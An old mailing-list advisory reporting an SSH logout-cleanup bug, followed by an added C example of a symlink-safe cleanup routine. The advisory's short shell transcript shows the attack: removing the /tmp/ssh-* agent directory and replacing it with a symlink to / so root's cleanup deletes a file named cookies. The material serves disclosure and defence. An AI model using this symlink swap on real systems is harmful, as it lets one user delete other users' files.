From: zen-parse@gmx.net
Date: Mon Jun 04 2001 - 05:14:29 CDT


    SSH allows deletion of other users' files.
    ==========================================

    You can delete any file on the filesystem you want...

    as long as it's called cookies.

    Not really a very useful bug, but could cause annoyances to
    people who actually like their cookies.

     /home/zen/.netscape/cookies

    sample exploit:-

     [root@clarity /root]# touch /cookies;ls /cookies
     /cookies
     [root@clarity /root]# ssh zen@localhost
     zen@localhost's password:
     Last login: Mon Jun 4 20:22:39 2001 from localhost.local
     Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
     [zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
     [zen@clarity zen]$ logout
     Connection to localhost closed.
     [root@clarity /root]# ls /cookies
     /bin/ls: /cookies: No such file or directory
     /bin/ls: /cookies: No such file or directory

    --zen-parse
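
The transcript above shows the logout cleanup removing a file named cookies through the /tmp/ssh-* path after that path had been replaced with a symlink. The following is an added example, not code from the original post or from any SSH implementation: one way a privileged cleanup routine can refuse that swap, by recording the directory's device and inode at creation, reopening it with O_NOFOLLOW, and unlinking relative to the verified descriptor. The function names and the /tmp/demo-* paths are assumptions made for the illustration.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Identity of the directory, recorded when the privileged process created it. */
struct dir_id { dev_t dev; ino_t ino; };

int remember_dir(const char *path, struct dir_id *id)
{
    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISDIR(st.st_mode)) return -1;
    id->dev = st.st_dev; id->ino = st.st_ino;
    return 0;
}
/* Remove `name` from `path` only if `path` is still that same real directory. */
int safe_cleanup(const char *path, const struct dir_id *id, const char *name)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0) return -1;               /* symlink, missing, or not a directory */
    if (fstat(fd, &st) != 0 || st.st_dev != id->dev || st.st_ino != id->ino) {
        close(fd); return -1;            /* replaced by a different directory */
    }
    int rc = unlinkat(fd, name, 0);      /* relative to the verified fd, not a path */
    close(fd);
    return rc;
}
/* Constructed scenario (hypothetical paths): swap=1 replaces the session dir with a
   symlink to another directory holding its own "cookies". Returns 1 if the file survives. */
int demo(int swap)
{
    char sess[] = "/tmp/demo-sess-XXXXXX", other[] = "/tmp/demo-other-XXXXXX", f[64];
    struct dir_id id;
    if (!mkdtemp(sess) || !mkdtemp(other) || remember_dir(sess, &id)) return -1;
    snprintf(f, sizeof f, "%s/cookies", swap ? other : sess);
    close(open(f, O_CREAT | O_WRONLY, 0600));
    if (swap && (rmdir(sess) || symlink(other, sess))) return -1;
    safe_cleanup(sess, &id, "cookies");
    int survived = access(f, F_OK) == 0;
    unlink(f); unlink(sess); rmdir(sess); rmdir(other);   /* tidy up demo files */
    return survived;
}
int main(void)
{
    printf("swapped: other file kept=%d; normal: session file kept=%d\n", demo(1), demo(0));
    return 0;
}
```

Running the cleanup with the session user's uid instead of root is a complementary fix, since it limits any removal to files that user could already delete.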